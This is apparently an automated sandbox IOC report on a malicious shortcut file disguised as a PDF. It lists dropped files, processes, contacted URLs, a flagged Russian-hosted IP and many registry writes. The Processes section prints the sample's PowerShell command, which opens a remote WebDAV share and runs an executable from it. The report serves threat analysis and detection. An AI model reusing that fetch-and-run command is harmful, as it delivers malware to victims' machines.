IOC Report
#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk

loading gif

Files

File Path
Type
Category
Malicious
#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 29 13:52:48 2024, mtime=Wed Oct 9 19:25:36 2024, atime=Thu Aug 29 13:52:48 2024, length=455680, window=hide
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x0e76ae96, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002f.db
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Windows[4].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kmzpyjj.rqd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv2hncff.ltq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S501F3OZP0M9B4UFR4QB.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d868607cb8559f7.customDestinations-ms (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" \\77.105.161.194@80\file\
malicious
C:\Windows\explorer.exe
explorer.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
https://api.msn.com/v1/news/Feed/Windows?
unknown
http://schemas.mi
unknown
https://api.msn.com/1$1
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
unknown
http://77.105.161.194/%
unknown
https://api.msn.com:443/v1/news/Feed/Windows?
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
unknown
https://excel.office.com
unknown
http://77.105.161.194/)
unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
unknown
https://aka.ms/odirm
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
http://77.105.161.194/
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
unknown
https://powerpoint.office.come
unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
unknown
http://77.105.161.194:80/
unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
unknown
http://crl.ver)
unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
unknown
http://77.105.161.194/i
unknown
http://schemas.micr
unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
unknown
https://outlook.com
unknown
https://aka.ms/Vh5j3k
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
https://www.rd.com/list/polite-habits-campers-dislike/
unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
unknown
https://api.msn.com/
unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
unknown
https://www.msn.com:443/en-us/feed
unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
unknown
https://word.office.com(
unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
unknown
There are 42 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.msn.com
unknown

IPs

IP
Domain
Country
Malicious
77.105.161.194
unknown
Russian Federation
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsStore_8wekyb3d8bbwe\ApplicationFrame\Microsoft.WindowsStore_8wekyb3d8bbwe!App
PreferredMinSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Unpacker
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\StagingInfo\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}
DriveNumber
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
TotalBytes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
FreeBytes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Blank Disc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Can Close
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Media Type
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Imapi Media State
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
IsImapiDataBurnSupported
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
IsImapiEraseSupported
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Live FS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Disc Label
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current Media
Set
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\BackupReminder
BackupReminderToastCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DiskSpaceChecking
LastInstallTimeLowStorageNotify
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\BackupReminder
LastTimeBackupReminderNotify
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@explorerframe.dll,-13137
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@explorerframe.dll,-13138
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}
Generation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
TraySearchBoxVisible
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
SearchboxWidthOld
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
SearchboxWidth
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
TraySearchBoxVisible
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
SearchboxWidthOld
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
SearchboxWidth
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
InstalledWin32AppsRevision
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010404
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020400
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203FA
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020402
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203F6
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000903EC
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203E4
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103E2
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103E6
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000303CA
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103D0
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203C6
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103CE
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103C2
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010380
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010350
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010348
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000040340
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000602F0
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020344
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000C0228
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000090038
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000070210
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000004028C
VirtualDesktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
InstalledWin32AppsRevision
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aac\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adt\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adts\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au3\OpenWithProgids
AutoIt3Script
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithProgids
WMP11.AssocFile.AVI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids
CABFolder
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cdxml\OpenWithProgids
Microsoft.PowerShellCmdletDefinitionXML.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.css\OpenWithProgids
CSSfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.csv\OpenWithProgids
Excel.CSV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dds\OpenWithProgids
ddsfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dib\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
dllfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
Word.Document.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
Word.DocumentMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Word.Document.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dot\OpenWithProgids
Word.Template.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotm\OpenWithProgids
Word.TemplateMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotx\OpenWithProgids
Word.Template.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.emf\OpenWithProgids
emffile
